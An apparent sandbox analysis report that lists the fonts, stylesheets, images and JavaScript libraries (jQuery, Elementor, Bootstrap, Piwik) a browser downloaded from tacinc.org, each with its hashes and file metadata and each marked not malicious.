                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/socialdriver/css/fontawesome/webfonts/fa-solid-900.woff2
                                                                                                                                                                                                                              Preview:wOF2......cP..........c..........................6.$. .`..<...... .@..m. %.......V'.......).=<E..........%........~.....W.......................S`0...0-.q.=^.../?.zn.Do,.pF..B..8Tr....5..n...Q.>...t:...Q...S....t..eV.....).`.Igb"......"ZI2}.,........#..."1.3.....j.V.....J.......$F..>:(|E..$...U.r.j.vOM.......^....T..$...w*.Dx`.lZ?a..D.`.r.A.UL........ x.]....|....V.D.T..8..R.X%.[.x.>..Z.r....g.?....UCuu.4VI.m.j..1.*K.NX.xn...,..8.Y...b...@.#..kw...%..HK..'...LOH..`.Y`v3fg.............(...(.)R.AERTX.V.LA.GQ.O..-...|o:...).%...{D.Z]=..'....0..6`..X`v..Cr.....)9A..,.^<%:@V..Pp.Lg8S...'.9..N..'......Q....r..^w....fr....;;..V....`.P...HB......!.C\....8...w.>].....|..,s...^./....z.........%...:I'.hw...t.6.......o.f.X.^.....k.....s.....fZ....z.(..%...v.JjI...d.............R`....z.{.=.,Q>.r>.L>d.d..4..!....]n]..K.A.UAD.k.p....Dwy..D......."@..>F!..&@..U........g.F..V.FcT..b4.........=l...~.#.....Y....{.....n............P...R.d.X...{..y.....k.?..2...
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1320)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):1360
                                                                                                                                                                                                                              Entropy (8bit):5.131237769754918
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:BGiL9VqsRthp0Mejm4s1RWe2LSaaq1aa5/DM/RR2ns4t8oYRFOobvuh0usUiEFyk:Bf9bLToj4we2L9DM/RQnv8oYjOobG53l
                                                                                                                                                                                                                              MD5:3D8175D8609012AB16CFFD6A79B0E107
                                                                                                                                                                                                                              SHA1:30BFC0A545C1F81EA3372CC4F2BF62843B5AE7CA
                                                                                                                                                                                                                              SHA-256:D62B100B1B584503697F88B5F2D2C03C52BF346A3C6DD7FFF2D3C5483B0A2C81
                                                                                                                                                                                                                              SHA-512:D240F8007743CDAE91B1D7FCC4D4133EAEA2F088DE0EED8DE5FAC0967C89A0AD7D9D25270591FECB6C4AE88966DA294DC250E7506A53F12DA1F43E0860143E5E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/js/text-editor.2c35aafbe5bf0e127950.bundle.min.js
                                                                                                                                                                                                                              Preview:/*! elementor - v3.24.0 - 09-10-2024 */."use strict";(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[357],{1327:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class TextEditor extends elementorModules.frontend.handlers.Base{getDefaultSettings(){return{selectors:{paragraph:"p:first"},classes:{dropCap:"elementor-drop-cap",dropCapLetter:"elementor-drop-cap-letter"}}}getDefaultElements(){const e=this.getSettings("selectors"),t=this.getSettings("classes"),r=jQuery("<span>",{class:t.dropCap}),p=jQuery("<span>",{class:t.dropCapLetter});return r.append(p),{$paragraph:this.$element.find(e.paragraph),$dropCap:r,$dropCapLetter:p}}wrapDropCap(){if(!this.getElementSettings("drop_cap"))return void(this.dropCapLetter&&(this.elements.$dropCap.remove(),this.elements.$paragraph.prepend(this.dropCapLetter),this.dropCapLetter=""));const e=this.elements.$paragraph;if(!e.length)return;const t=e.html().replace(/&nbsp;/g," "),r=t.match(/^ *([^ ] ?)/);if(!r)return;
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (22888), with CRLF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):25535
                                                                                                                                                                                                                              Entropy (8bit):5.019017478042186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Lx7nxMMA6r5P3PuHoxC/fiE4HsRLLe5Z4QJRSX7byx:LxLxMMXr5/PV0dKx
                                                                                                                                                                                                                              MD5:9786F8F10922959AF63824DAF8178200
                                                                                                                                                                                                                              SHA1:BA6C6F7261BBEFF5693388EAEF7BB1232F67B257
                                                                                                                                                                                                                              SHA-256:4F39097BBBE888FB88ED804482A737E7259C6A73C87459EE394640F060F9B42E
                                                                                                                                                                                                                              SHA-512:92E48F3740344FF9F047ED7D31CCEEC3737B2D0895F6899A068577BBFC9E721FC424A399F90D822EEA6799A014B965F28A471327FB2853CA51F945DF2C44B4B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/f953364aee27a43a60234e2b4425cdf5.css
                                                                                                                                                                                                                              Preview:/**handles:cookie-law-info,cookie-law-info-gdpr**/..#cookie-law-info-bar{font-size:15px;margin:0 auto;padding:12px 10px;position:absolute;text-align:center;box-sizing:border-box;width:100%;z-index:9999;display:none;left:0;font-weight:300;box-shadow:0 -1px 10px 0 rgba(172,171,171,.3)}#cookie-law-info-again{font-size:10pt;margin:0;padding:5px 10px;text-align:center;z-index:9999;cursor:pointer;box-shadow:#161616 2px 2px 5px 2px}#cookie-law-info-bar span{vertical-align:middle}.cli-plugin-button,.cli-plugin-button:visited{display:inline-block;padding:9px 12px;color:#fff;text-decoration:none;position:relative;cursor:pointer;margin-left:5px;text-decoration:none}.cli-plugin-main-link{margin-left:0;font-weight:550;text-decoration:underline}.cli-plugin-button:hover{background-color:#111;color:#fff;text-decoration:none}.small.cli-plugin-button,.small.cli-plugin-button:visited{font-size:11px}.cli-plugin-button,.cli-plugin-button:visited,.medium.cli-plugin-button,.medium.cli-plugin-button:visited{f
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 17976, version 1.0
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):17976
                                                                                                                                                                                                                              Entropy (8bit):7.98697655302854
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:9IhY0b23J+aNucahg1OAXVIpQqr73ThUIdLBHHQ1fh0sweesO:I5bZahapYAQCJ5Zm1pxVjO
                                                                                                                                                                                                                              MD5:C9983D3D04F3ED6C2EAFEE1DB1D24E06
                                                                                                                                                                                                                              SHA1:8CB9B463E41CD9D556A3727EAF8A64A2C7BD8734
                                                                                                                                                                                                                              SHA-256:1A60331C6FB3A2EEF23E7C1E44F7EE6BF41F4F2F96B99757D8BC845B3A807B7D
                                                                                                                                                                                                                              SHA-512:C11E9CDB8DFA2552330FD70F42E1A601D7EFFDC2F9E836DF3CB77092505B886521CBA1149CD111B5D1446C34E51297F17ECD8C59A2FCBFD2ACF083D2C7844118
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/tac-child/css/fonts/ibm-plex-sans-v8-latin-700.woff2
                                                                                                                                                                                                                              Preview:wOF2......F8..........E..........................@..f..l.`....@..s.....8..7..p..6.$..\. .."..5..t.:...S.r;0K..k..........B..I-'..?#9.C..S.....*..P.BI3..c.~p...9.N.b..q...x.Q..+..e..P...P..^...o.....l........uMQ/..........*cQq..g...E......2.....w....A..j.....L......j......L^&......../..u...hldhL'Z{.....s.*.+T.............lST@f4" .H.I.DIK..(..h{..1e...U...'....Y..jw..K.e.XN>...j....WX.9E..]..qrT.]]..E.tW..Q.7.~...70..0.Sx.W._....eY..9q..%.+L.e...........?....G`^e..-..Y~...pwk...]W...,.[..0....N.........l~.$..r...R..J...u.t.:.k.!..]c...z22.g...d..=..toO.T..I._.q@.x....w....mN...mu[...,.9..%..m...z.y.....V6.......d......a....p.E...']....nm...I`..{ ./.{/..&.^@C.L...._.A....N...9....^..^.?....VD.V.....X!.#....;.d'{l'../0+...E...)./...\.K.,..&...8..T,.Gg.d...TIH~|...l....P.....60K.+.m.g3c...P....1....i.Al..K....7...cJ..........o...F..UQQ...5n..z.W.kr[.....tE.y....N{_.*5.p.T............8#b..Y._......j..[.o..../..u.j...6...xyYs-...|o.....z@..L%.%......W
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1169), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):1169
                                                                                                                                                                                                                              Entropy (8bit):4.869433083105984
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:+7/Xrf8XJINTJ9gLDVN0GNFMTfc9H8cyi1q4jMK19H8pyFKy9H8Oyu:+7/7f8XJWTJ9qDP0gFMzck4Jt7
                                                                                                                                                                                                                              MD5:B2CBE99D8031AC4D6C933D1568E7C9BB
                                                                                                                                                                                                                              SHA1:DB1E979D0ECA4CF392BD0543A8AA80D672A26EE7
                                                                                                                                                                                                                              SHA-256:01F802530D67DBBCC841796BF9C917E142FA4B3B0C17749A1C4BC8C6021ADDB3
                                                                                                                                                                                                                              SHA-512:3261C5F7C5B17EB4877B979E3384D845B932801260B8498C547E73BEAD810D144BBC802A7D5DA4CBC2B4ECE58A2FD942A72E8AEBA66E0A6D124CF2B71DFB398E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/elementor/css/post-865.css
                                                                                                                                                                                                                              Preview:.elementor-kit-865{--e-global-color-primary:#6EC1E4;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-global-typography-secondary-font-family:"Roboto Slab";--e-global-typography-secondary-font-weight:400;--e-global-typography-text-font-family:"Roboto";--e-global-typography-text-font-weight:400;--e-global-typography-accent-font-family:"Roboto";--e-global-typography-accent-font-weight:500;}.elementor-kit-865 e-page-transition{background-color:#FFBC7D;}.elementor-section.elementor-section-boxed > .elementor-container{max-width:1140px;}.e-con{--container-max-width:1140px;}.elementor-widget:not(:last-child){margin-block-end:0px;}.elementor-element{--widgets-spacing:0px 0px;}{}h1.entry-title{display:var(--page-title-display);}@media(max-width:1024px){.elementor-section.elementor-section-boxed > .elementor-container{max-width:1024px;}.e-con{--cont
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (11409), with CRLF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):15641
                                                                                                                                                                                                                              Entropy (8bit):5.0177057159997185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:DthsVmeDXDSnvgZenHANKdXSMpNO96hDIzL79V1QVSD1CNxn6fR31VueVkw:WzDSnvuenHAYNBhDInSwh311D
                                                                                                                                                                                                                              MD5:05B7C0409DF7BC0877469C41FD4B1F5A
                                                                                                                                                                                                                              SHA1:F57549AE7289137DA768FB962519CC257B0717A5
                                                                                                                                                                                                                              SHA-256:EDFA541FC55BA933C170EDF1A027D389791FA60D5335208BB081B0471A80736E
                                                                                                                                                                                                                              SHA-512:203E24A6AB23058D4F2C9CF8F0643582F78A32B14EC6DD8AB9C181645C7680F369D276869856B529904E6D48F83E2C755287183E6E64398446DDBB9CE915AE44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/734068639650f4963a14da140b3e84b8.css
                                                                                                                                                                                                                              Preview:/**handles:mediaelement,wp-mediaelement**/...mejs-offscreen{border:0;clip:rect(1px,1px,1px,1px);-webkit-clip-path:inset(50%);clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal}.mejs-container{background:#000;font-family:Helvetica,Arial,serif;position:relative;text-align:left;text-indent:0;vertical-align:top}.mejs-container,.mejs-container *{box-sizing:border-box}.mejs-container video::-webkit-media-controls,.mejs-container video::-webkit-media-controls-panel,.mejs-container video::-webkit-media-controls-panel-container,.mejs-container video::-webkit-media-controls-start-playback-button{-webkit-appearance:none;display:none!important}.mejs-fill-container,.mejs-fill-container .mejs-container{height:100%;width:100%}.mejs-fill-container{background:transparent;margin:0 auto;overflow:hidden;position:relative}.mejs-container:focus{outline:none}.mejs-iframe-overlay{height:100%;position:absolute;width:100%}.mejs-embed,.mejs-embed bo
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13482
                                                                                                                                                                                                                              Entropy (8bit):5.28370367369775
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:3yiUGUQ/cHkN/MpqtNMCC/Rilm6Udn3LzoJphH8uClD2tFtJ7byTwtF:3yiUGUQ/cEN/MpqDMCC/MA6cn3L0JplN
                                                                                                                                                                                                                              MD5:6CFE4FC46FDAD99CDC663A9640600858
                                                                                                                                                                                                                              SHA1:1962C34D2104F35CDBD48A674B7B22FA6E8831DF
                                                                                                                                                                                                                              SHA-256:BBD90E143917692A4337DCDF0F9BDEB628FF4A3F7C3D9B3230B4B5F3DE504C53
                                                                                                                                                                                                                              SHA-512:ACFCD4E90697F97E86F62EF097940759661D085842476441CE0AE62BA0D6201271E420F5B82FF2FBBA0D6C9F214478B60D1DCF281FC993DC17BE3139BA2CF476
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/**handles:wp-hooks,wp-i18n**/../*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>S,addAction:()=>m,addFilter:()=>p,applyFilters:()=>k,createHooks:()=>h,currentAction:()=>w,currentFilter:()=>I,defaultHooks:()=>f,didAction:()=>O,didFilter:()=>j,doAction:()=>b,doingAction:()=>x,doingFilter:()=>T,filters:()=>z,hasAction:()=>v,hasFilter:()=>y,removeAction:()=>A,removeAllActions:()=>F,removeAllFilters:()=>g,removeFilter:()=>_});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers,
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65405), with CRLF, LF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):101173
                                                                                                                                                                                                                              Entropy (8bit):5.275511830422301
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:URUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GK8rP7QK:MHNwcv9VBQpLl88SMBQ47GK8rPU+B
                                                                                                                                                                                                                              MD5:4F37101FF3EE8F069D1CA3852FFBBF18
                                                                                                                                                                                                                              SHA1:3B8EA9226CBC21FD30160E4D9BA42DFBF1F3D1DE
                                                                                                                                                                                                                              SHA-256:C4D4233A44F3AE1CEF58B97A2E551008E9A8A5403B1C26C67136A0A20F9C7EB1
                                                                                                                                                                                                                              SHA-512:3903964C0EB415E1565CF07F9D46A06E5754C96D1A006491F64E79C8724AFE785EE426DE0D2E6ADCC53CAD0B0E947910C722B348AB9A016DD41D364C2B6C2102
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/**handles:jquery-core,jquery-migrate**/../*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10231), with CRLF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):10253
                                                                                                                                                                                                                              Entropy (8bit):5.102247543474495
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:C7X04gQXKccEOMfKvCiMmaF8LQZonSOVpo6Z8oC8sVyFcZ2ctuzr5u5o3Hg4:MhnabENfKvCiMmaF8LQynSOVpo6Zk8IE
                                                                                                                                                                                                                              MD5:663CE8825C9E0A6CE96CC0CD9AF66899
                                                                                                                                                                                                                              SHA1:CD6E1306D76F95DDBB59BF199C929151FE3F047F
                                                                                                                                                                                                                              SHA-256:FFF30A80415E9E849082ED1C758F521E52B4284B3C71E134B4CE15685F6A52F0
                                                                                                                                                                                                                              SHA-512:E76D16BEC2EA8A02AA0B1F0A72288CBF000DA13FA07AFEEC8E591130360B0B0DD7BDA6A1A9FBC2B9135D31AFF381DCA71E8D7840A9F3D2ABC181CB0E42247F5D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/6419b4d897e8dc5284378e8acb00aa04.js
                                                                                                                                                                                                                              Preview:/**handles:ecspro**/..var EleCustomSkinSlider=elementorModules.frontend.handlers.Base.extend({getSkinPrefix:function e(){return"custom_"},getDefaultSettings:function e(){return{selectors:{carousel:".swiper-container",slideContent:".swiper-slide"}}},getDefaultElements:function e(){var t=this.getSettings("selectors"),n={$carousel:this.$element.find(t.carousel)};return n.$swiperSlides=n.$carousel.find(t.slideContent),n},getSlidesCount:function e(){return this.elements.$swiperSlides.length},getSwiperSettings:function e(){const n=this.getElementSettings(),t=+n[this.getSkinPrefix()+"slides_to_show"]||3,i=1===t,s=elementorFrontend.config.responsive.activeBreakpoints,o={mobile:1,tablet:i?1:2},r={slidesPerView:t,loop:"yes"===n[this.getSkinPrefix()+"infinite"],speed:n[this.getSkinPrefix()+"speed"],handleElementorBreakpoints:!0,breakpoints:{}};let a=t;Object.keys(s).reverse().forEach(e=>{var t=o[e]||a;r.breakpoints[s[e].value]={slidesPerView:+n[this.getSkinPrefix()+"slides_to_show_"+e]||t,slidesP
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):1249370
                                                                                                                                                                                                                              Entropy (8bit):5.284753209003542
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:2xXCuONi2pMPcMxXM208175RXl8svDr7e8k4XWTHA3zi3kd:2xLOO0y77h7r7Hk4XWTHA3zi3A
                                                                                                                                                                                                                              MD5:00764D21AC5B2ED16124B230D388F06D
                                                                                                                                                                                                                              SHA1:1928E1F1A497E4A0076B11018105D8E034460E6A
                                                                                                                                                                                                                              SHA-256:D2AC101ADFB5C923A2C45E25611D16D2C444655BC659035806372876E4172F62
                                                                                                                                                                                                                              SHA-512:37BAD4B1D992B354A2BD2F5025EA560CFD50B23051F7D003942ACA30C9B3EFE3158E45E5F2A903517876E00BE8A54A24F90BA361D991B904502F033B132EFF34
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/socialdriver/js/functions-spb.min.js
                                                                                                                                                                                                                              Preview:!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(this,function(t,c,s){"use strict";function N(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}function e(t,e,i){e&&N(t.prototype,e),i&&N(t,i)}function o(n){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{},e=Object.keys(s);(e="function"==typeof Object.getOwnPropertySymbols?e.concat(Object.getOwnPropertySymbols(s).filter(function(t){return Object.getOwnPropertyDescriptor(s,t).enumerable})):e).forEach(function(t){var e=n,i=s[t=t];t in e?Object.defineProperty(e,t,{value:i,enumerable:!0,configurable:!0,writable:!0}):e[t]=i})}return n}c=c&&c.hasOwnProperty("default")?c.default:c,s=s&&s.hasOwnProperty("default")?s.defau
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):436
                                                                                                                                                                                                                              Entropy (8bit):7.469748532484135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:QuC0JeeCMYZOoXEyW0A2ZdB9x8cLc5s99:QuvJerLZ5XhBnB9ar5w9
                                                                                                                                                                                                                              MD5:67150962FA7C27DFA059D6F7588A2939
                                                                                                                                                                                                                              SHA1:56DB4E5C0D08DE47D8F05BC2E34A0E29248B81F4
                                                                                                                                                                                                                              SHA-256:7E62017BF0C24B2A98EF3BB12F4D886F6935C3F9B012EFED2BE62626A834EF36
                                                                                                                                                                                                                              SHA-512:E225D5705682F7A27F8EF8E4DEE0F087E2CCD3A9407797D6A166F3BC89AFE53BB400925EFEA08F58B5E17F01EDE149EB5E777095CF0A26E26C2B656181E7F71A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/2020/11/favicon32.png
                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../....?.6.$5.b.<..VL.<...m.HL..||...9.....67..4. .m...??....~..D.@..D...@....!..h..a2.A. ..?^$.f..(s.E5......%....i.5.z5cV$m.Xg...3...1..4? ....!.....u9|...c..+oW.c.~..X.m+qhw7...[[..?.<.'....E.....d&./....p.J*r9.9.|`1.&.+vi!...._r...........x72.>.=`kW.n....^N..kx|z|..g7........H.p;.>.28..sn.....X.`.3..:..o....C..5.A._'.vH.....2PK.$.&e...({.,..I/&..'.........&"..l|.Q...T.J...G....L.....%..|..*.tz"../..
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1924)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):70428
                                                                                                                                                                                                                              Entropy (8bit):5.469499541611815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:ks2uk/OvnnsqfxBGTFrGvheC7nSZkBKf7XIuLs5Wsi4VU:A/GnfkyNnSBV5R
                                                                                                                                                                                                                              MD5:1A90FFCED473947FED02997FB89F1636
                                                                                                                                                                                                                              SHA1:3FBCA9786523A24BB9FA157B93A2A570BD7665B3
                                                                                                                                                                                                                              SHA-256:230FACBC81B146C0992A734F6B1A47DF5E051302A2C5B0412020A411A49F3A14
                                                                                                                                                                                                                              SHA-512:B43C09A0EC93BB859C8C1F024C4642704ECF6BC7F24592EEE7DBFC2E4A93A2E8075AABFAAAF5401996F56123C210DBDB156CAF8DD9D9B1EB412D1AE4019D24AB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/*!!. * Piwik - free/libre analytics platform. *. * JavaScript tracking client. *. * @link https://piwik.org. * @source https://github.com/matomo-org/matomo/blob/master/js/piwik.js. * @license https://piwik.org/free-software/bsd/ BSD-3 Clause (also in js/LICENSE.txt). * @license magnet:?xt=urn:btih:c80d50af7d3db9be66a4d0a86db0286e4fd33292&dn=bsd-3-clause.txt BSD-3-Clause. */.;if(typeof window.JSON==="object"&&typeof window.JSON.stringify==="function"&&typeof window.JSON.parse==="function"){JSON_PIWIK=window.JSON}else{(function(){var a={};./*!! JSON v3.3.2 | http://bestiejs.github.io/json3 | Copyright 2012-2014, Kit Cambridge | http://kit.mit-license.org */.(function(){var c=typeof define==="function"&&define.amd;var e={"function":true,object:true};var h=e[typeof a]&&a&&!a.nodeType&&a;var i=e[typeof window]&&window||this,b=h&&e[typeof module]&&module&&!module.nodeType&&typeof global=="object"&&global;if(b&&(b.global===b||b.window===b||b.self===b)){i=b}function j(ab,V){ab||(ab=i.Object()
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 2560x1707, components 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):655713
                                                                                                                                                                                                                              Entropy (8bit):7.9848086836077234
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:gLhcLCFb98dZByw84wa2HgvqKIB83NgwF7FH92/Jy9x2MxkR:u6obOZBywEgSvoNgwF7osjqR
                                                                                                                                                                                                                              MD5:EAAF413F3A5DA4C9CAD03A927634E627
                                                                                                                                                                                                                              SHA1:3D947902353C1ED7059B44293744901C4C1A6303
                                                                                                                                                                                                                              SHA-256:6C2EA542DAAEFCA7FAED3E003E7658CD863D14D38C3EE1FDA738D3CA42E5BEEF
                                                                                                                                                                                                                              SHA-512:20912A932D64F2A5A4707EDE3AD34CBBEED892E73EE79352CB80B68E35B7C139D96139536EA8ED50AD6EC01E46C7FAC81F0AC47248A46B97200169C3D9F2E123
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:......JFIF...........................................$......$ &...& 9-''-9B747BOGGOd_d................................$......$ &...& 9-''-9B747BOGGOd_d..............".................................................|..}."J.........8O.v".=h...:KS..d`.....w..k=H..:F..5x.u.-.3.I...}o.y...J.%.o!........YkH.=.y.u7P...k.V..s.{..iq.~m..w.oZ./q...4..]..Y}.F.:(z.m.nz.]^.[L.?4.le..?.Z...b..+d..3.:<..8zh...[..RJ=....GU.^.+...........&..S.i,g^...y.......w.t.k.9.z.......z..&~....P.`W...6.....hj........$..........6..X......s._.....G..9.u.....U.......f1"qNig,+..........oI.}<h......h.mU.l..G)....Q..O[./..$...!.Y/..g...65xM...;h-.p.@q..c...]...h...l.....e}[#.....i..d..L.*#.m.s;.+..'..3..._.F.filkzW....9.;..J.<.R...]._7}%....-..-.l(.m=..~.K.....Bba......W.4...;q......{xP...F..%.&#D..\H.8X...4.Z....>B.5x+(....s.?m.....8.M.K<?...s....g....z.....egoCZ8L.........&.$c..<F..*;^Cz.lj..+.d.X..#7\.W0.I..I...t..B.`k`L....L.Cd=B...I..|-p.9..,T5....R..m...-.[..|..t.....p6G......
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65496)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):80657
                                                                                                                                                                                                                              Entropy (8bit):5.173890525978993
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:4eAjA679C+QRNtewmXC4WHqMPBWPbx84XwCRfYNQAzeLHeBHmjknzRNS4cR8+StQ:2wmJjAOIOV2BCWju0ELv
                                                                                                                                                                                                                              MD5:65B14E77A11C2BAFFCA6E3BC0EBC4598
                                                                                                                                                                                                                              SHA1:41411F5E9440995A516347CDEBCB5465ABE5FFA1
                                                                                                                                                                                                                              SHA-256:E76FE1DDF34B81940A8C974FC571B1C51A778C80D826FBA7DEE495582630E26B
                                                                                                                                                                                                                              SHA-512:5FB3A081097A60551F31A2BEF8D25CB4AE5070B8E98A2A2E27C7E348C49EA1ECF9ECCA31DE767485E8F1E466C7AD2600DCD54D2DDA93AC59A9425EBAE5262AA7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/elementor/assets/js/frontend-modules.min.js
